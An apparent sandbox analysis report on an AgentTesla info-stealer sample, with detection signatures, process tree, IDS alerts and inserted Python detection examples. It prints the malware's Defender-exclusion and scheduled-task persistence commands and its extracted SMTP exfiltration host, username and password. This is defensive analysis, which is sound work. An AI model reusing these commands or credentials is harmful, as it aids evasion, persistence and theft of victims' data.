Windows Analysis Report
SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe

Overview

General Information

Sample name: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe
Analysis ID: 1427139
MD5: 78f627add2ccdd0f16400418e5f829b8
SHA1: 013aac15ad0a20af80eb1f86cdf27e6159c7ac9b
SHA256: 7abd4b1c93d30c7ab8f817ebcf83262950131614590c9b254f05449ec493818c
Tags: exe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe (PID: 5268 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe" MD5: 78F627ADD2CCDD0F16400418E5F829B8)
    • powershell.exe (PID: 2716 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2616 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TuZRpLi.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7204 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 5484 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TuZRpLi" /XML "C:\Users\user\AppData\Local\Temp\tmp8319.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 3628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • TuZRpLi.exe (PID: 2124 cmdline: C:\Users\user\AppData\Roaming\TuZRpLi.exe MD5: 78F627ADD2CCDD0F16400418E5F829B8)
    • schtasks.exe (PID: 7324 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TuZRpLi" /XML "C:\Users\user\AppData\Local\Temp\tmp9170.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • TuZRpLi.exe (PID: 7376 cmdline: "C:\Users\user\AppData\Roaming\TuZRpLi.exe" MD5: 78F627ADD2CCDD0F16400418E5F829B8)
    • TuZRpLi.exe (PID: 7384 cmdline: "C:\Users\user\AppData\Roaming\TuZRpLi.exe" MD5: 78F627ADD2CCDD0F16400418E5F829B8)
    • TuZRpLi.exe (PID: 7392 cmdline: "C:\Users\user\AppData\Roaming\TuZRpLi.exe" MD5: 78F627ADD2CCDD0F16400418E5F829B8)
    • TuZRpLi.exe (PID: 7400 cmdline: "C:\Users\user\AppData\Roaming\TuZRpLi.exe" MD5: 78F627ADD2CCDD0F16400418E5F829B8)

Malware family
Name: Agent Tesla, AgentTesla
Description: A .NET-based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Extracted configuration (AgentTesla): {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.thelamalab.com", "Username": "billing@thelamalab.com", "Password": "Thel@malab@20!9"}
Yara matches (Source: Rule; Description; Author)

PCAP
  dump.pcap: JoeSecurity_AgentTesla_1; Yara detected AgentTesla; Joe Security

Memory dumps
  00000009.00000002.3258452239.00000000033B6000.00000004.00000800.00020000.00000000.sdmp: JoeSecurity_AgentTesla_1; Yara detected AgentTesla; Joe Security
  00000011.00000002.3259301451.0000000002D4E000.00000004.00000800.00020000.00000000.sdmp: JoeSecurity_AgentTesla_1; Yara detected AgentTesla; Joe Security
  00000011.00000002.3259301451.0000000002D56000.00000004.00000800.00020000.00000000.sdmp: JoeSecurity_AgentTesla_1; Yara detected AgentTesla; Joe Security
  00000009.00000002.3258452239.00000000033AE000.00000004.00000800.00020000.00000000.sdmp: JoeSecurity_AgentTesla_1; Yara detected AgentTesla; Joe Security
  00000009.00000002.3255739299.0000000000434000.00000040.00000400.00020000.00000000.sdmp: JoeSecurity_CredentialStealer; Yara detected Credential Stealer; Joe Security
  (remaining rows collapsed in the original report: "Click to see the 15 entries")

Unpacked PE files
  0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cf9000.8.unpack: JoeSecurity_CredentialStealer; Yara detected Credential Stealer; Joe Security
  0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cf9000.8.unpack: JoeSecurity_AgentTesla_1; Yara detected AgentTesla; Joe Security
  0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cf9000.8.unpack: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID; Detects executables referencing Windows vault credential objects. Observed in infostealers; ditekSHen
    Matched strings:
    0x316e9: $s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
    0x3175b: $s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
    0x317e5: $s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
    0x31877: $s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
    0x318e1: $s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
    0x31953: $s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
    0x319e9: $s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
    0x31a79: $s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
  0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cbe5e0.6.unpack: JoeSecurity_CredentialStealer; Yara detected Credential Stealer; Joe Security
  0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cbe5e0.6.unpack: JoeSecurity_AgentTesla_1; Yara detected AgentTesla; Joe Security
  (remaining rows collapsed in the original report: "Click to see the 9 entries")
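The vault-GUID rule above fires on string literals, not on behaviour. As an added example that is not the rule author's code and not part of this report, the Python below searches a buffer for the eight schema GUIDs listed in the match, in both ASCII and UTF-16LE (the .NET #US heap stores string literals as UTF-16LE, so an ASCII-only grep over an unpacked .NET payload finds nothing), and applies a PE-header check with a two-GUID threshold. The threshold, the schema names in the comments, the helper names and the sample buffer are this example's own assumptions and constructions, not taken from the report or from the published rule.

```python
"""Scanner for the Windows Vault schema GUIDs matched by the
INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID hit above. Added example, not the rule
author's code; it checks ASCII and UTF-16LE because .NET keeps string literals
as UTF-16LE in the #US heap, so an ASCII-only grep misses them."""
from typing import Iterator

# GUIDs exactly as listed in the report's Yara match. The schema names are the
# commonly documented Windows Vault names and are an annotation of this example,
# not part of the report.
VAULT_SCHEMA_GUIDS = {
    "2F1A6504-0641-44CF-8BB5-3612D865F2E5": "Windows Secure Note",
    "3CCD5499-87A8-4B10-A215-608888DD3B55": "Windows Web Password Credential",
    "154E23D0-C644-4E6F-8CE6-5069272F999F": "Windows Credential Picker Protector",
    "4BF4C442-9B8A-41A0-B380-DD4A704DDB28": "Web Credentials",
    "77BC582B-F0A6-4E15-4E80-61736B6F3B29": "Windows Credentials",
    "E69D7838-91B5-4FC9-89D5-230D4D4CC2BC": "Windows Domain Certificate Credential",
    "3E0E35BE-1B77-43E7-B873-AED901B6275B": "Windows Domain Password Credential",
    "3C886FF3-2669-4AA2-A8FB-3F6759A77548": "Windows Extended Credential",
}
ENCODINGS = ("ascii", "utf-16-le")


def _find_all(hay: bytes, needle: bytes) -> Iterator[int]:
    """Yield every offset at which needle occurs in hay (overlaps included)."""
    start = 0
    while (idx := hay.find(needle, start)) != -1:
        yield idx
        start = idx + 1


def find_vault_guids(data: bytes) -> dict[str, list[tuple[int, str]]]:
    """Map each GUID found to its (offset, encoding) hits, in file order."""
    low = data.lower()  # bytes.lower() touches ASCII only, so UTF-16LE survives
    hits: dict[str, list[tuple[int, str]]] = {}
    for guid in VAULT_SCHEMA_GUIDS:
        for enc in ENCODINGS:
            for off in _find_all(low, guid.lower().encode(enc)):
                hits.setdefault(guid, []).append((off, enc))
    return hits


def is_pe(data: bytes) -> bool:
    return data[:2] == b"MZ"


def classify(data: bytes, min_distinct: int = 2) -> tuple[bool, dict]:
    """Flag a PE that references at least min_distinct schema GUIDs. The
    threshold is this example's assumption, not the published rule's condition;
    a single GUID can appear in legitimate software that uses the vault API."""
    hits = find_vault_guids(data)
    return is_pe(data) and len(hits) >= min_distinct, hits


def build_sample() -> bytes:
    """Constructed stand-in for the unpacked .NET payload: an MZ header, filler,
    then the eight GUIDs as NUL-terminated UTF-16LE literals."""
    body = b"\x00" * 64
    for guid in VAULT_SCHEMA_GUIDS:
        body += guid.encode("utf-16-le") + b"\x00\x00"
    return b"MZ" + body


def describe(data: bytes) -> list[str]:
    """Human-readable lines such as '0x42 utf-16-le 4BF4C442-... (Web Credentials)'."""
    _, hits = classify(data)
    return [f"0x{off:x} {enc} {guid} ({VAULT_SCHEMA_GUIDS[guid]})"
            for guid, offs in hits.items() for off, enc in offs]


if __name__ == "__main__":
    flagged, _ = classify(build_sample())
    print("flagged:", flagged)
    print("\n".join(describe(build_sample())))
```

To run it against a real unpacked payload, pass the file bytes to classify(); the offsets it reports are file offsets, like the 0x316e9-style offsets in the Yara match above.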

                      System Summary

Sigma rule matches. In every process record below the Command field names the System32 path while the Image field is under SysWOW64: the sample is a 32-bit process, so the child launches it requests go through WoW64 file-system redirection. Hunt on the Image field, not on the command-line path.

Source: Process started; rule author: Florian Roth (Nextron Systems); listed twice in the original report
  Command / CommandLine / ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe"
  CommandLine|base64offset|contains: ~2yzw
  Image / NewProcessName / OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe"
  ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, ParentProcessId: 5268, ParentProcessName: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe
  ProcessId: 2716, ProcessName: powershell.exe

Source: Process started; rule author: Florian Roth (Nextron Systems)
  Command / CommandLine / ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TuZRpLi" /XML "C:\Users\user\AppData\Local\Temp\tmp9170.tmp"
  CommandLine|base64offset|contains: *j
  Image / NewProcessName / OriginalFileName: C:\Windows\SysWOW64\schtasks.exe
  ParentCommandLine: C:\Users\user\AppData\Roaming\TuZRpLi.exe
  ParentImage: C:\Users\user\AppData\Roaming\TuZRpLi.exe, ParentProcessId: 2124, ParentProcessName: TuZRpLi.exe
  ProcessId: 7324, ProcessName: schtasks.exe

Source: Network Connection; rule author: frack113
  DestinationIp: 162.222.226.100, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Protocol: tcp, Initiated: true
  Image: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, ProcessId: 6604
  SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49704

Source: Process started; rule author: Florian Roth (Nextron Systems)
  Command / CommandLine / ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TuZRpLi" /XML "C:\Users\user\AppData\Local\Temp\tmp8319.tmp"
  CommandLine|base64offset|contains: *j
  Image / NewProcessName / OriginalFileName: C:\Windows\SysWOW64\schtasks.exe
  ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe"
  ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, ParentProcessId: 5268, ParentProcessName: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe
  ProcessId: 5484, ProcessName: schtasks.exe

Source: Process started; rule author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
  Command / CommandLine / ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe"
  CommandLine|base64offset|contains: ~2yzw
  Image / NewProcessName / OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe"
  ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, ParentProcessId: 5268, ParentProcessName: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe
  ProcessId: 2716, ProcessName: powershell.exe

                      Persistence and Installation Behavior

Source: Process started; rule author: Joe Security
  Command / CommandLine / ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TuZRpLi" /XML "C:\Users\user\AppData\Local\Temp\tmp8319.tmp"
  CommandLine|base64offset|contains: *j
  Image / NewProcessName / OriginalFileName: C:\Windows\SysWOW64\schtasks.exe
  ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe"
  ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, ParentProcessId: 5268, ParentProcessName: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe
  ProcessId: 5484, ProcessName: schtasks.exe
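The Sigma matches in this report reduce to four testable conditions on process-creation and network-connection telemetry: powershell.exe invoking Add-MpPreference with an exclusion switch, schtasks.exe /Create reading its task XML from AppData\Local\Temp, schtasks.exe /Create spawned by a parent living in a user-writable directory, and an outbound connection to an SMTP port from an image that is not a mail client. As an added example that is not part of this report and not Joe Sandbox or Sigma project code, the Python below re-implements those conditions and runs them over records built from this report's process tree and network entry. The conhost record is the report's; the explorer-spawned schtasks (PID 9001), the OUTLOOK.EXE connection (PID 4242), the SMTP allowlist and all function and field names are this example's own constructions and assumptions.

```python
"""Sigma-style re-implementation of the checks this report matched, evaluated
over events constructed from its process tree and network entry. Added example;
not Joe Sandbox or Sigma project code."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:  # subset of a Sysmon EID 1 / Security 4688 record
    pid: int
    image: str
    command_line: str
    parent_image: str


@dataclass(frozen=True)
class NetworkEvent:  # subset of a Sysmon EID 3 record
    pid: int
    image: str
    dest_ip: str
    dest_port: int
    initiated: bool


# Paths as they appear in the report. Command says System32 while Image says
# SysWOW64: the 32-bit sample's child launches go through WoW64 redirection.
SAMPLE = r"C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe"
COPY = r"C:\Users\user\AppData\Roaming\TuZRpLi.exe"
PS_IMG = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
PS_CMD = r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"'
ST_IMG = r"C:\Windows\SysWOW64\schtasks.exe"
ST_CMD = r'"C:\Windows\System32\schtasks.exe"'
TEMP = r"C:\Users\user\AppData\Local\Temp"

# First five records are from the report's process tree; PID 9001 is a
# constructed benign schtasks launch used as a control.
PROCESS_EVENTS = [
    ProcessEvent(2716, PS_IMG, f'{PS_CMD} Add-MpPreference -ExclusionPath "{SAMPLE}"', SAMPLE),
    ProcessEvent(2616, PS_IMG, f'{PS_CMD} Add-MpPreference -ExclusionPath "{COPY}"', SAMPLE),
    ProcessEvent(5484, ST_IMG, f'{ST_CMD} /Create /TN "Updates\\TuZRpLi" /XML "{TEMP}\\tmp8319.tmp"', SAMPLE),
    ProcessEvent(7324, ST_IMG, f'{ST_CMD} /Create /TN "Updates\\TuZRpLi" /XML "{TEMP}\\tmp9170.tmp"', COPY),
    ProcessEvent(5900, r"C:\Windows\System32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1", PS_IMG),
    ProcessEvent(9001, r"C:\Windows\System32\schtasks.exe",
                 r'schtasks.exe /Create /TN "Backup" /XML "C:\ProgramData\Backup\task.xml"', r"C:\Windows\explorer.exe"),
]
# PID 6604 is the report's SMTP connection; the OUTLOOK.EXE record is constructed.
NETWORK_EVENTS = [
    NetworkEvent(6604, SAMPLE, "162.222.226.100", 587, True),
    NetworkEvent(4242, r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE", "10.0.0.25", 587, True),
]

SMTP_PORTS = {25, 465, 587, 2525}
# Assumed allowlist of images expected to speak SMTP; tune per environment.
SMTP_ALLOWED = {r"c:\program files\microsoft office\root\office16\outlook.exe"}
EXCLUSION_FLAGS = ("-exclusionpath", "-exclusionextension", "-exclusionprocess", "-exclusionipaddress")
TEMP_XML_RE = re.compile(r'/xml\s+"?[^"]*\\appdata\\local\\temp\\', re.I)
USER_WRITABLE_RE = re.compile(r"\\users\\[^\\]+\\(appdata|desktop|downloads)\\", re.I)


def _is(ev, exe):
    return ev.image.lower().endswith("\\" + exe)


def powershell_defender_exclusion(ev):
    cl = ev.command_line.lower()
    return _is(ev, "powershell.exe") and "add-mppreference" in cl and any(f in cl for f in EXCLUSION_FLAGS)


def schtasks_xml_from_temp(ev):
    return _is(ev, "schtasks.exe") and "/create" in ev.command_line.lower() \
        and TEMP_XML_RE.search(ev.command_line) is not None


def schtasks_from_user_writable_parent(ev):
    return _is(ev, "schtasks.exe") and "/create" in ev.command_line.lower() \
        and USER_WRITABLE_RE.search(ev.parent_image) is not None


def suspicious_outbound_smtp(ev):
    return ev.initiated and ev.dest_port in SMTP_PORTS and ev.image.lower() not in SMTP_ALLOWED


PROCESS_RULES = {
    "powershell_defender_exclusion": powershell_defender_exclusion,
    "schtasks_xml_from_temp": schtasks_xml_from_temp,
    "schtasks_from_user_writable_parent": schtasks_from_user_writable_parent,
}
NETWORK_RULES = {"suspicious_outbound_smtp": suspicious_outbound_smtp}


def evaluate(process_events=PROCESS_EVENTS, network_events=NETWORK_EVENTS):
    """Return {rule name: [matching PIDs]} in event order."""
    hits = {name: [] for name in (*PROCESS_RULES, *NETWORK_RULES)}
    for ev in process_events:
        for name, rule in PROCESS_RULES.items():
            if rule(ev):
                hits[name].append(ev.pid)
    for ev in network_events:
        for name, rule in NETWORK_RULES.items():
            if rule(ev):
                hits[name].append(ev.pid)
    return hits


if __name__ == "__main__":
    for name, pids in evaluate().items():
        print(f"{name}: {pids}")
```

Both schtasks rules fire on the same two launches here, which is the useful property: the task XML in %TEMP% and the parent in Desktop or AppData\Roaming are independent signals, so a variant that writes its XML elsewhere still trips the parent-path check. Feed evaluate() your own Sysmon-derived records to reuse it.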
Snort IDS Alerts

Timestamp                 SID      Src Port  Dst Port  Protocol  Classtype
04/17/24-04:38:01.123740  2839723  49704     587       TCP       A Network Trojan was detected
04/17/24-04:38:01.123740  2851779  49704     587       TCP       A Network Trojan was detected
04/17/24-04:38:01.123740  2030171  49704     587       TCP       A Network Trojan was detected
04/17/24-04:38:01.123740  2855542  49704     587       TCP       A Network Trojan was detected
04/17/24-04:38:01.123740  2855245  49704     587       TCP       A Network Trojan was detected
04/17/24-04:38:01.123740  2840032  49704     587       TCP       A Network Trojan was detected
04/17/24-04:38:03.579390  2855542  49705     587       TCP       A Network Trojan was detected
04/17/24-04:38:03.579390  2855245  49705     587       TCP       A Network Trojan was detected
04/17/24-04:38:03.579390  2851779  49705     587       TCP       A Network Trojan was detected
04/17/24-04:38:03.579390  2840032  49705     587       TCP       A Network Trojan was detected
04/17/24-04:38:03.579390  2030171  49705     587       TCP       A Network Trojan was detected
04/17/24-04:38:03.579390  2839723  49705     587       TCP       A Network Trojan was detected

                      AV Detection

The dropped copy C:\Users\user\AppData\Roaming\TuZRpLi.exe carries the same MD5 as the submitted sample (see the process tree), so the two sets of vendor detection rates below describe one and the same file.

Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cf9000.8.raw.unpack; Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.thelamalab.com", "Username": "billing@thelamalab.com", "Password": "Thel@malab@20!9"}
Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe; ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe; Virustotal: Detection: 29%
Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe; ReversingLabs: Detection: 18%
Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe; Virustotal: Detection: 29%
Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe; Joe Sandbox ML: detected
Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe; Joe Sandbox ML: detected
Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Networking

Source: Traffic; Snort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.5:49704 -> 162.222.226.100:587
Source: Traffic; Snort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.5:49704 -> 162.222.226.100:587
Source: Traffic; Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49704 -> 162.222.226.100:587
Source: Traffic; Snort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.5:49704 -> 162.222.226.100:587
Source: Traffic; Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.5:49704 -> 162.222.226.100:587
Source: Traffic; Snort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.5:49704 -> 162.222.226.100:587
Source: Traffic; Snort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.5:49705 -> 162.222.226.100:587
Source: Traffic; Snort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.5:49705 -> 162.222.226.100:587
Source: Traffic; Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49705 -> 162.222.226.100:587
Source: Traffic; Snort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.5:49705 -> 162.222.226.100:587
Source: Traffic; Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.5:49705 -> 162.222.226.100:587
Source: Traffic; Snort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.5:49705 -> 162.222.226.100:587
Source: Yara match; File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cf9000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cbe5e0.6.raw.unpack, type: UNPACKEDPE
Source: global traffic; TCP traffic: 192.168.2.5:49704 -> 162.222.226.100:587
Source: Joe Sandbox View; IP Address: 162.222.226.100
Source: Joe Sandbox View; ASN Name: PUBLIC-DOMAIN-REGISTRYUS
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; DNS traffic detected: queries for: mail.thelamalab.com
Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, 00000009.00000002.3258452239.00000000033B6000.00000004.00000800.00020000.00000000.sdmp, TuZRpLi.exe, 00000011.00000002.3259301451.0000000002D56000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://mail.thelamalab.com
Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, 00000000.00000002.2023593017.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp, TuZRpLi.exe, 0000000A.00000002.2050510414.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, 00000000.00000002.2025026137.0000000003CBE000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, 00000009.00000002.3255739299.0000000000434000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: https://account.dyn.com/

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cf9000.8.raw.unpack, K6raBsUk6.cs; .Net Code: jBQYf8LWw3h

                      System Summary

                      barindex
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cf9000.8.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cbe5e0.6.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cf9000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cbe5e0.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, ArffRecord.csLarge array initialization: : array initializer size 617583
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.5630000.10.raw.unpack, .csLarge array initialization: : array initializer size 13798
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 0_2_00E4E4000_2_00E4E400
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 0_2_051073380_2_05107338
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 0_2_051073290_2_05107329
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 0_2_051053AC0_2_051053AC
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 0_2_05D0C9C80_2_05D0C9C8
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 0_2_05D04C000_2_05D04C00
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 0_2_05D047C80_2_05D047C8
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 0_2_05D06FB80_2_05D06FB8
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 0_2_05D066CF0_2_05D066CF
